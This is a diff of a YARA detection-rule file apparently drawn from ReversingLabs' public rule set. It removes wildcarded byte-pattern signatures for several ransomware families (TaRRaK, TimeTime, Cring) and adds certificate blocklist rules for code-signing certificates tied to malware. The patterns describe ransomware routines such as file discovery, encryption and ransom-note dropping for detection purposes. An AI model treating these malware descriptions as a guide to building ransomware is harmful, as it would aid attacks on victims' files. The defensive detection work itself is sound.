-            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B
-            45 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$find_files_2 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ??
-            89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8D B5 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ?? ?? ?? 89
-            C3 BB ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4B 75 ?? 33 DB 8D 45 ?? 33 C9 BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8A 14 1E 88 54 05 ?? 40 43 80 3C 1E ?? 74 ?? 83 F8
-            ?? 7E ?? 43 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 80 7C 1E
-            ?? ?? 75 ?? 80 3C 1E ?? 74 ?? 81 FB ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 33 C0 5A 59 59 64
-            89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80
-            FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50
-            8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF
-        }
-		$encrypt_files_p2 = {
-            75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? 8B C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B
-            45 ?? 50 8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF
-            75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B
-            15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$main_routine = {
-            8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 8D 55 ?? 66
-            B8 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B
-            0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 8D 55 ??
-            33 C0 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF
-            51
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $main_routine ) and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "6b:72:ca:36:7d:40:fb:ef:16:e7:3e:6e:ba:6a:9a:59" and 1476748800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Tarrak : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_736B7663D322533413F36E3E7E55F920 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TaRRaK ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a783df87-0c9b-5868-9af0-c32b11e8b71b"
-		date = "2021-09-06"
-		modified = "2021-09-06"
+		id = "1991779a-8b5d-5188-8a36-c8451923e88f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.TaRRaK.yara#L1-L96"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a8c4c4a501d94da94ae4a2e1eb2846e841249659be64dd45f46584885d000635"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13458-L13474"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "44e86319106a4bf8edba6c1be2f90d68b3d1ef4591f0cc23921a0dc4da4a407b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TaRRaK"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 73 ?? ?? ?? ?? 0D 09 08 28 ?? ?? ?? ?? 7D
-            ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ??
-            02 08 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ??
-            0A 16 0B 2B ?? 06 07 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 11 ?? 28 ?? ?? ?? ??
-            07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 2A
-        }
-		$encrypt_files_p2 = {
-            03 8E 69 17 59 0A 06 17 2F ?? 03 2A 03 06 95 0B 16 0D 1C 1F ?? 06 17 58 5B 58 13 ?? 2B
-            ?? 09 20 ?? ?? ?? ?? 58 0D 09 18 64 19 5F 13 ?? 16 13 ?? 2B ?? 03 11 ?? 17 58 95 0C 03
-            11 ?? 8F ?? ?? ?? ?? 25 4B 02 09 08 07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11
-            ?? 0B 11 ?? 17 58 13 ?? 11 ?? 06 32 ?? 03 16 95 0C 03 06 8F ?? ?? ?? ?? 25 4B 02 09 08
-            07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11 ?? 0B 16 11 ?? 25 17 59 13 ?? 32 ??
-            03 2A
-        }
-		$encrypt_files_p3 = {
-            05 1B 64 04 18 62 61 04 19 64 05 1A 62 61 58 03 04 61 0E ?? 0E ?? 19 5F 6A 0E ?? 6E 61
-            D4 95 05 61 58 61 2A
-        }
-		$encrypt_files_p4 = {
-            03 8E 2D ?? 03 2A 02 02 02 03 17 28 ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 16 28 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2A
-        }
-		$find_files_p1 = {
-            73 ?? ?? ?? ?? 25 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25
-            2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 2A
-        }
-		$find_files_p2 = {
-            73 ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1B 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F
-            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
-        }
-		$change_desktop = {
-            1F ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 17
-            8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 1F ?? 16
-            06 19 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A
-        }
-		$drop_ransom_note = {
-            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 2A 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 02 7B ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 0D 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 26 07 6F ??
-            ?? ?? ?? 26 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
-            2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 07 11 ?? 6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ??
-            DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07 6F ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 06 28 ?? ?? ?? ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? DE ??
-            26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26
-            DE ?? 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Net Technology" and pe.signatures [ i ] . serial == "73:6b:76:63:d3:22:53:34:13:f3:6e:3e:7e:55:f9:20" and 1159488000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_54A170102461Fdc967Acfafe4Bbbc7F0 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d012df1d-5e85-57b4-8a79-5da91369a14a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13476-L13492"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ddae18d566fa2fd077f51d0afff74fb8a8e525f88f23908c7402a4b2c092ad24"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $change_desktop ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "54:a1:70:10:24:61:fd:c9:67:ac:fa:fe:4b:bb:c7:f0" and 1476748800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timetime : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0C501B8B113209C96C8119Cf7A6B8B79 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TimeTime ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "27bff941-01ce-5bf7-a9d8-d01d2db3bfd3"
-		date = "2022-02-21"
-		modified = "2022-02-21"
+		id = "9ec73230-10cd-55ad-9ef7-56a875294cab"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.TimeTime.yara#L1-L75"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "43867dd793bc84e6f39ca2de1aff4047a742b295dc4df94cd337bd2ef89e4a62"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13494-L13510"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dca37fda83650979566fb6ffbedaf713955a3c7f03ecc62e2e155475b7ca00e4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TimeTime"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$rename_files = {
-            00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 00 07 28 ?? ?? ??
-            ?? 16 FE 01 0C 08 2C ?? 2B ?? 00 00 07 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 00 DC 2A
-        }
-		$find_files = {
-            00 73 ?? ?? ?? ?? 0A 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 07 2C ?? 06 0C DD ?? ?? ??
-            ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C
-            ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ??
-            ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DE ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11
-            ?? 11 ?? 9A 13 ?? 00 06 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69
-            32 ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 00 06 11 ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? 13 ??
-            00 00 DE ?? 06 0C 2B ?? 08 2A
-        }
-		$encrypt_folder = {
-            00 02 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C
-            00 00 08 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 0D 09 2C ?? 00 16 13 ?? 16 13 ?? 08 73
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 08 19
-            73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 00 DE ??
-            11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 11 ?? 16 FE 01 11 ?? 5F 11 ?? 5F 13 ?? 11 ?? 2C
-            ?? 00 08 28 ?? ?? ?? ?? 00 00 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ??
-            ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A
-        }
-		$encrypt_files = {
-            00 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 2C ?? 38 ?? ?? ?? ?? 02 7E ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 0D 09 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 0A 06 8E 69 8D ?? ?? ?? ?? 0B 16 13 ?? 2B
-            ?? 00 06 11 ?? 91 13 ?? 11 ?? 17 58 D1 13 ?? 11 ?? D2 13 ?? 07 11 ?? 11 ?? 9C 00 11 ??
-            17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 02 07 28 ?? ?? ?? ?? 00 02 02 7E ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 7E
-            ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 00 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $encrypt_folder ) and ( $rename_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "0c:50:1b:8b:11:32:09:c9:6c:81:19:cf:7a:6b:8b:79" and 1474329600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cring : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0300Ee4A4C52443147821A8186D04309 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cring ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "76530a6d-145b-5316-8200-4b191d0754fd"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "abccf84f-ba18-5644-897c-d23a228facff"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Cring.yara#L1-L66"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "05cf60ad39c9dcc592345f13b63c99b153b9253297a8ad9e52e0439081d8c796"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13512-L13528"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8476ece98427c1ffd99d820c25fe664397de2c393473f7d5ee0846d8d840fd9e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cring"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 19 2E ?? 08 6F ?? ?? ?? ??
-            18 33 ?? 08 6F ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 02 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            0D 2B ?? 09 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 6F
-            ?? ?? ?? ?? DC 07 17 58 0B 07 06 8E 69 32 ?? 2A
-        }
-		$find_files_p2 = {
-            02 7B ?? ?? ?? ?? 0B 07 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 16 0A DD ??
-            ?? ?? ?? 02 15 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
-            ?? ?? 14 0C 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 2C
-            ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 2B ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ??
-            9A 0D 02 09 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 17 0A DD ?? ?? ?? ?? 02 15 7D ?? ?? ??
-            ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 8E 69
-            32 ?? 02 14 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 14 0C 02 7B ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 39 ?? ?? ?? ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 9A 13 ?? 02 11 ?? 02 7B ?? ?? ??
-            ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 1F ?? 7D ?? ?? ??
-            ?? 2B ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 7D ?? ?? ?? ?? 02 18 7D ?? ??
